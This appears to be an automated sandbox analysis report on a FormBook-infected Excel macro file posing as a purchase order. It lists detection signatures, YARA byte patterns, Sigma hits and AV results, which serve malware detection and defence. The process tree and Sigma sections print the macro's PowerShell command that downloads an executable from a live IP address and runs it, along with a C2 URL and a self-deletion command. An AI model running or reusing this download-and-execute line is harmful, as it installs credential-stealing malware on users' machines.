Windows Analysis Report purchase Order.xlsm

Overview

General Information

Sample Name: purchase Order.xlsm
Analysis ID: 510341
MD5: d1ad5761044b2abb12b78700f1a3a537
SHA1: 7fed2064ae3681227f674608df64ff1d7c45a2ee
SHA256: 8024e6dc8c230782b570a234318ba7b5a72f64ad5a1a3ff81584e080d9338eba
Tags: xlsm
Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Found detection on Joe Sandbox Cloud Basic with higher score
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Sigma detected: Microsoft Office Product Spawning Windows Shell
Injects a PE file into a foreign processes
Powershell drops PE file
Sigma detected: Execution from Suspicious Folder
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Document exploit detected (process start blacklist hit)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to call native functions
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Yara detected Xls With Macro 4.0
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Checks if the current process is being debugged
Drops PE files to the user directory
Dropped file seen in connection with other malware
Excel documents contains an embedded macro which executes code when the document is opened
Sigma detected: Windows Suspicious Use Of Web Request in CommandLine
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 5708 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • powershell.exe (PID: 6124 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://212.192.241.75/sam/new3.exe -OutFile $env:public\eVJOpc.exe;explorer $env:public\eVJOpc.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 2976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • explorer.exe (PID: 6892 cmdline: 'C:\Windows\system32\explorer.exe' C:\Users\Public\eVJOpc.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
  • explorer.exe (PID: 7112 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: AD5296B280E8F522A8A897C96BAB0E1D)
    • eVJOpc.exe (PID: 1840 cmdline: 'C:\Users\Public\eVJOpc.exe' MD5: 0EDC34831B45EDED59BD2AEEF85AA41B)
      • eVJOpc.exe (PID: 4104 cmdline: 'C:\Users\Public\eVJOpc.exe' MD5: 0EDC34831B45EDED59BD2AEEF85AA41B)
        • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • wlanext.exe (PID: 5660 cmdline: C:\Windows\SysWOW64\wlanext.exe MD5: CD1ED9A48316D58513D8ECB2D55B5C04)
            • cmd.exe (PID: 2316 cmdline: /c del 'C:\Users\Public\eVJOpc.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
              • conhost.exe (PID: 2260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.art-for-a-cause.com/m5cw/"], "decoy": ["stolpfabriken.com", "aromaessentialco.com", "rmcclaincpa.com", "wuruixin.com", "sidhyanticlasses.com", "horilka.store", "organic-outlaws.com", "customsoftwarelogistics.com", "cheryltesting.com", "thecompacthomegym.com", "the22yards.club", "quickloanprovidersservices.com", "grippyent.com", "guard-usa.com", "agircredit.com", "classificationmetallurgie.com", "quizzesandcode.com", "catdanos.com", "8676789.rest", "gotbestshavlngplansforyou.com", "supboarddesign.com", "byrdemailplans.xyz", "anngola.com", "milelefoods.com", "runawaypklyau.xyz", "redesignyourpain.com", "yourtv2ship.info", "jxypc.com", "lerjighjuij.store", "spiruline-shop.com", "qarziba-therapy.care", "hardayumangosteen.com", "freevolttech.com", "xiongbaosp.xyz", "balanzasdeplataforma.com", "johnathanmanney.com", "estcequecestgreen.com", "france-temps-partage.net", "fbiicrc.com", "privateairjets.com", "xn--5m4a23skoc.group", "andrewmurnane.com", "exitin90.com", "depofmvz.com", "bosphorus.website", "aragon.store", "nrnmuhendislik.com", "thesharingcorporation.com", "tccraft.online", "carjabber.com", "limitlesschurchbf.com", "dazalogistics.com", "x-play.club", "bitterbay.net", "forwardhcd.com", "smance.xyz", "netgearcloud.net", "wellaspiron.com", "heidelay.xyz", "qknzutohbtro.mobi", "epurhybrid.com", "pelitupmukaeksklusif.com", "secondave.online", "lockdownshowdown.online"]}

Yara Overview

Initial Sample

Source: app.xml; Rule: JoeSecurity_XlsWithMacro4; Description: Yara detected Xls With Macro 4.0; Author: Joe Security

Memory Dumps

Source: 00000009.00000002.452707003.00000000009E0000.00000040.00020000.sdmp; Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
Source: 00000009.00000002.452707003.00000000009E0000.00000040.00020000.sdmp; Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com; Strings:
      • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 00000009.00000002.452707003.00000000009E0000.00000040.00020000.sdmp; Rule: Formbook; Description: detect Formbook in memory; Author: JPCERT/CC Incident Response Group; Strings:
      • 0x16ac9:$sqlite3step: 68 34 1C 7B E1
      • 0x16bdc:$sqlite3step: 68 34 1C 7B E1
      • 0x16af8:$sqlite3text: 68 38 2A 90 C5
      • 0x16c1d:$sqlite3text: 68 38 2A 90 C5
      • 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
Source: 00000009.00000001.370883277.0000000000400000.00000040.00020000.sdmp; Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
Source: 00000009.00000001.370883277.0000000000400000.00000040.00020000.sdmp; Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com; Strings: identical to the matches listed for 00000009.00000002.452707003.00000000009E0000.00000040.00020000.sdmp above

Unpacked PEs

Source: 8.2.eVJOpc.exe.f040000.1.unpack; Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
Source: 8.2.eVJOpc.exe.f040000.1.unpack; Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com; Strings:
          • 0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18d97:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19e3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 8.2.eVJOpc.exe.f040000.1.unpack; Rule: Formbook; Description: detect Formbook in memory; Author: JPCERT/CC Incident Response Group; Strings:
          • 0x15cc9:$sqlite3step: 68 34 1C 7B E1
          • 0x15ddc:$sqlite3step: 68 34 1C 7B E1
          • 0x15cf8:$sqlite3text: 68 38 2A 90 C5
          • 0x15e1d:$sqlite3text: 68 38 2A 90 C5
          • 0x15d0b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x15e33:$sqlite3blob: 68 53 D8 7F 8C
Source: 9.2.eVJOpc.exe.400000.0.unpack; Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
Source: 9.2.eVJOpc.exe.400000.0.unpack; Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com; Strings: identical to the matches listed for 8.2.eVJOpc.exe.f040000.1.unpack above

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started; Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team; Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://212.192.241.75/sam/new3.exe -OutFile $env:public\eVJOpc.exe;explorer $env:public\eVJOpc.exe, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://212.192.241.75/sam/new3.exe -OutFile $env:public\eVJOpc.exe;explorer $env:public\eVJOpc.exe, CommandLine|base64offset|contains: z), Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 5708, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://212.192.241.75/sam/new3.exe -OutFile $env:public\eVJOpc.exe;explorer $env:public\eVJOpc.exe, ProcessId: 6124
Sigma detected: Execution from Suspicious Folder
Source: Process started; Author: Florian Roth; Data: Command: 'C:\Users\Public\eVJOpc.exe' , CommandLine: 'C:\Users\Public\eVJOpc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\eVJOpc.exe, NewProcessName: C:\Users\Public\eVJOpc.exe, OriginalFileName: C:\Users\Public\eVJOpc.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 7112, ProcessCommandLine: 'C:\Users\Public\eVJOpc.exe' , ProcessId: 1840
Sigma detected: Windows Suspicious Use Of Web Request in CommandLine
Source: Process started; Author: James Pemberton / @4A616D6573; Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://212.192.241.75/sam/new3.exe -OutFile $env:public\eVJOpc.exe;explorer $env:public\eVJOpc.exe, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://212.192.241.75/sam/new3.exe -OutFile $env:public\eVJOpc.exe;explorer $env:public\eVJOpc.exe, CommandLine|base64offset|contains: z), Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 5708, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://212.192.241.75/sam/new3.exe -OutFile $env:public\eVJOpc.exe;explorer $env:public\eVJOpc.exe, ProcessId: 6124
Sigma detected: Non Interactive PowerShell
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://212.192.241.75/sam/new3.exe -OutFile $env:public\eVJOpc.exe;explorer $env:public\eVJOpc.exe, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://212.192.241.75/sam/new3.exe -OutFile $env:public\eVJOpc.exe;explorer $env:public\eVJOpc.exe, CommandLine|base64offset|contains: z), Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 5708, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://212.192.241.75/sam/new3.exe -OutFile $env:public\eVJOpc.exe;explorer $env:public\eVJOpc.exe, ProcessId: 6124
Sigma detected: T1086 PowerShell Execution
Source: Pipe created; Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research); Data: PipeName: \PSHost.132798575499604118.6124.DefaultAppDomain.powershell

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000009.00000001.370883277.0000000000400000.00000040.00020000.sdmp; Malware Configuration Extractor: FormBook (configuration as listed under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: purchase Order.xlsm; Virustotal: Detection: 22%
Source: purchase Order.xlsm; ReversingLabs: Detection: 40%
Yara detected FormBook
Source: Yara match; File source: 8.2.eVJOpc.exe.f040000.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 9.2.eVJOpc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 9.1.eVJOpc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 9.1.eVJOpc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 9.0.eVJOpc.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match; File source: 9.0.eVJOpc.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match; File source: 9.0.eVJOpc.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 9.0.eVJOpc.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match; File source: 9.0.eVJOpc.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 9.2.eVJOpc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.eVJOpc.exe.f040000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000009.00000002.452707003.00000000009E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000001.370883277.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000000.369496333.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000013.00000002.559434313.00000000009B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000000.402139557.00000000079AA000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.452190143.0000000000590000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000000.367914995.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.452060611.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.374253259.000000000F040000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000000.429302805.00000000079AA000.00000040.00020000.sdmp, type: MEMORY
Antivirus / Scanner detection for submitted sample
Source: purchase Order.xlsm; Avira: detected
Antivirus detection for URL or domain
Source: www.art-for-a-cause.com/m5cw/; Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: http://212.192.241.75/sam/new3.exe; Virustotal: Detection: 11%
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\nsz3A72.tmp\qqxmvpxcvyt.dll; Avira: detection malicious, Label: TR/Tesla.ivvdd
Source: C:\Users\Public\eVJOpc.exe; Avira: detection malicious, Label: TR/Tesla.amqdv
Multi AV Scanner detection for dropped file
Source: C:\Users\Public\eVJOpc.exe; ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Temp\nsz3A72.tmp\qqxmvpxcvyt.dll; ReversingLabs: Detection: 37%
Machine Learning detection for dropped file
Source: C:\Users\Public\eVJOpc.exe; Joe Sandbox ML: detected
Source: 8.2.eVJOpc.exe.f040000.1.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.2.eVJOpc.exe.400000.0.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.1.eVJOpc.exe.400000.0.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.0.eVJOpc.exe.400000.3.unpack; Avira: Label: TR/Patched.Ren.Gen2
Source: 19.2.wlanext.exe.2e7de48.1.unpack; Avira: Label: TR/Patched.Ren.Gen
Source: 9.0.eVJOpc.exe.400000.6.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.0.eVJOpc.exe.400000.0.unpack; Avira: Label: TR/Patched.Ren.Gen2
Source: 9.0.eVJOpc.exe.400000.4.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.0.eVJOpc.exe.400000.2.unpack; Avira: Label: TR/Patched.Ren.Gen2
Source: 9.0.eVJOpc.exe.400000.5.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.0.eVJOpc.exe.400000.1.unpack; Avira: Label: TR/Patched.Ren.Gen2
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; File opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: Binary string: wntdll.pdbUGP source: eVJOpc.exe, 00000008.00000003.370323842.000000000F210000.00000004.00000001.sdmp, eVJOpc.exe, 00000009.00000002.452970458.0000000000B20000.00000040.00000001.sdmp, wlanext.exe, 00000013.00000002.564446547.00000000033CF000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: eVJOpc.exe, wlanext.exe
Source: Binary string: wlanext.pdb source: eVJOpc.exe, 00000009.00000002.452915644.0000000000AD0000.00000040.00020000.sdmp
Source: Binary string: wlanext.pdbGCTL source: eVJOpc.exe, 00000009.00000002.452915644.0000000000AD0000.00000040.00020000.sdmp
Source: C:\Users\Public\eVJOpc.exe; Code function: 8_2_00405E93 FindFirstFileA,FindClose,
Source: C:\Users\Public\eVJOpc.exe; Code function: 8_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\Public\eVJOpc.exe; Code function: 8_2_00402671 FindFirstFileA,

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Source: global traffic; TCP traffic: 192.168.2.3:49746 -> 212.192.241.75:80
Source: excel.exe; Memory has grown: Private usage: 1MB later: 68MB

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor; URLs: www.art-for-a-cause.com/m5cw/
Source: Joe Sandbox View; ASN Name: RAPMSB-ASRU RAPMSB-ASRU
Source: global traffic; HTTP traffic detected: HTTP/1.1 200 OK, Date: Wed, 27 Oct 2021 16:19:34 GMT, Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30, Last-Modified: Tue, 26 Oct 2021 23:46:46 GMT, ETag: "41504-5cf4a171fd45b", Accept-Ranges: bytes, Content-Length: 267524, Keep-Alive: timeout=5, max=100, Connection: Keep-Alive, Content-Type: application/x-msdownload
Source: global traffic; HTTP traffic detected: GET /sam/new3.exe HTTP/1.1, User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1, Host: 212.192.241.75, Connection: Keep-Alive
Source: unknown; TCP traffic detected without corresponding DNS query: 212.192.241.75
            Source: powershell.exe, 00000001.00000002.357769457.0000000004B13000.00000004.00000001.sdmp | String found in binary or memory: http://212.192.241.75
            Source: PowerShell_transcript.061544.RzyXj49c.20211027181911.txt.1.dr | String found in binary or memory: http://212.192.241.75/sam/new3.exe
            Source: powershell.exe, 00000001.00000002.355847421.0000000002B50000.00000004.00000040.sdmp, powershell.exe, 00000001.00000002.356485936.0000000002C48000.00000004.00000020.sdmp, powershell.exe, 00000001.00000002.363747347.00000000077EA000.00000004.00000001.sdmp, powershell.exe, 00000001.00000002.355784668.0000000002B40000.00000004.00000040.sdmp | String found in binary or memory: http://212.192.241.75/sam/new3.exe-OutFile$env:public
            Source: powershell.exe, 00000001.00000002.356654326.0000000002C77000.00000004.00000020.sdmp | String found in binary or memory: http://212.192.241.75/sam/new3.exenvoke-WebRequest
            Source: powershell.exe, 00000001.00000002.357769457.0000000004B13000.00000004.00000001.sdmp | String found in binary or memory: http://212.192.241.754
            Source: powershell.exe, 00000001.00000002.356654326.0000000002C77000.00000004.00000020.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: eVJOpc.exe, eVJOpc.exe, 00000008.00000000.354925603.0000000000409000.00000008.00020000.sdmp, eVJOpc.exe, 00000009.00000000.359874534.0000000000409000.00000008.00020000.sdmp, eVJOpc.exe.1.dr | String found in binary or memory: http://nsis.sf.net/NSIS_Error
            Source: eVJOpc.exe, 00000008.00000000.354925603.0000000000409000.00000008.00020000.sdmp, eVJOpc.exe, 00000009.00000000.359874534.0000000000409000.00000008.00020000.sdmp, eVJOpc.exe.1.dr | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: powershell.exe, 00000001.00000002.361493895.0000000005A36000.00000004.00000001.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
            Source: global trafficHTTP traffic detected: GET /sam/new3.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: 212.192.241.75Connection: Keep-Alive
            Source: eVJOpc.exe, 00000008.00000002.372343961.00000000006CA000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
            Source: C:\Users\Public\eVJOpc.exeCode function: 8_2_00404FC2 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

            E-Banking Fraud:

            Yara detected FormBook
            Source: Yara match | File source: 8.2.eVJOpc.exe.f040000.1.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 9.2.eVJOpc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 9.1.eVJOpc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 9.1.eVJOpc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 9.0.eVJOpc.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 9.0.eVJOpc.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 9.0.eVJOpc.exe.400000.5.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 9.0.eVJOpc.exe.400000.5.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 9.0.eVJOpc.exe.400000.6.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 9.2.eVJOpc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 8.2.eVJOpc.exe.f040000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000009.00000002.452707003.00000000009E0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000001.370883277.0000000000400000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000000.369496333.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000013.00000002.559434313.00000000009B0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000A.00000000.402139557.00000000079AA000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.452190143.0000000000590000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000000.367914995.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.452060611.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.374253259.000000000F040000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000A.00000000.429302805.00000000079AA000.00000040.00020000.sdmp, type: MEMORY

            System Summary:

            Malicious sample detected (through community Yara rule)
            Source: 8.2.eVJOpc.exe.f040000.1.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 8.2.eVJOpc.exe.f040000.1.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
            Source: 9.2.eVJOpc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 9.2.eVJOpc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
            Source: 9.1.eVJOpc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 9.1.eVJOpc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
            Source: 9.1.eVJOpc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 9.1.eVJOpc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
            Source: 9.0.eVJOpc.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
